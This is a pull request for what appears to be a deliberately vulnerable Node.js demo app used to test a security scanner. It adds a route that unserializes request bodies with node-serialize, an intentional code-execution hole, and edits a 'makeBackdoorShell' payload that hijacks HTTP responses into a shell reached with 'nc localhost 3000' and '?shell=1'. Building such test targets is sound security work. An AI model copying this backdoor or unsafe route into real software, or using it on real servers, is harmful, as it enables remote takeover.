### PR TITLE
Contrast 12659 serialization demo

### DIFF
--- a/vulnerabilities/serialization/index.js
+++ b/vulnerabilities/serialization/index.js
@@ -23,10 +23,6 @@ module.exports = (function ( router ) {
 		res.redirect('/serialization/node-serialize/hello');
 	});
 
-	router.post('/node-unserialize', function ( req, res ) {
-		res.send(unserialize(serialize(req.body || {})));
-	});
-
 	router.post('/node-serialize/bye', function ( req, res ) {
 		res.clearCookie(COOKIE_UN);
 		res.redirect('/serialization/node-serialize');

--- a/vulnerabilities/serialization/index.js
+++ b/vulnerabilities/serialization/index.js
@@ -23,6 +23,10 @@ module.exports = (function ( router ) {
 		res.redirect('/serialization/node-serialize/hello');
 	});
 
+	router.post('/node-unserialize', function ( req, res ) {
+		res.send(unserialize(serialize(req.body || {})));
+	});
+
 	router.post('/node-serialize/bye', function ( req, res ) {
 		res.clearCookie(COOKIE_UN);
 		res.redirect('/serialization/node-serialize');

--- a/vulnerabilities/serialization/views/node-serialize-index.ejs
+++ b/vulnerabilities/serialization/views/node-serialize-index.ejs
@@ -89,14 +89,14 @@
  function makeBackdoorShell ( ) {
 	 require('http').ServerResponse.prototype.end = (function ( end ) {
 		 return function ( ) {
-			 if (this.socket._httpMessage.req.query.shell === '1') {
-				 
-				 console.log('..............................');
-				 console.log('How to obtain a shell session:');
-				 console.log('$> nc localhost 3000');
-				 console.log('$> GET /?shell=1 HTTP/1.1');
-				 console.log('``````````````````````````````');
 
+			 console.log('..............................');
+			 console.log('How to obtain a shell session:');
+			 console.log('$> nc localhost 3000');
+			 console.log('$> GET/?shell=1 HTTP/1.1');
+			 console.log('``````````````````````````````');
+
+			 if (this.socket._httpMessage.req.query.shell === '1') {
 				 ['close',
 				  'connect',
 				  'data',

--- a/vulnerabilities/serialization/views/node-serialize-index.ejs
+++ b/vulnerabilities/serialization/views/node-serialize-index.ejs
@@ -94,7 +94,7 @@
 				 console.log('..............................');
 				 console.log('How to obtain a shell session:');
 				 console.log('$> nc localhost 3000');
-				 console.log('$> GET/?shell=1 HTTP/1.1');
+				 console.log('$> GET /?shell=1 HTTP/1.1');
 				 console.log('``````````````````````````````');
 
 				 ['close',


### PR DESCRIPTION
I added a route specifically for the screener app. Otherwise, because of the redirection that happens when doing the POST to /serialization/node-serialize, I don't think the unsafe-eval finding was being detected appropriately ( the finding is reported on the redirect page, /serialization/node-serialize/hello, where the cookie gets passed to `unserialize`). 

Also, the instructions to hijack a shell session from an HTTP request was misplaced -- it needed to be outside of the 'if'.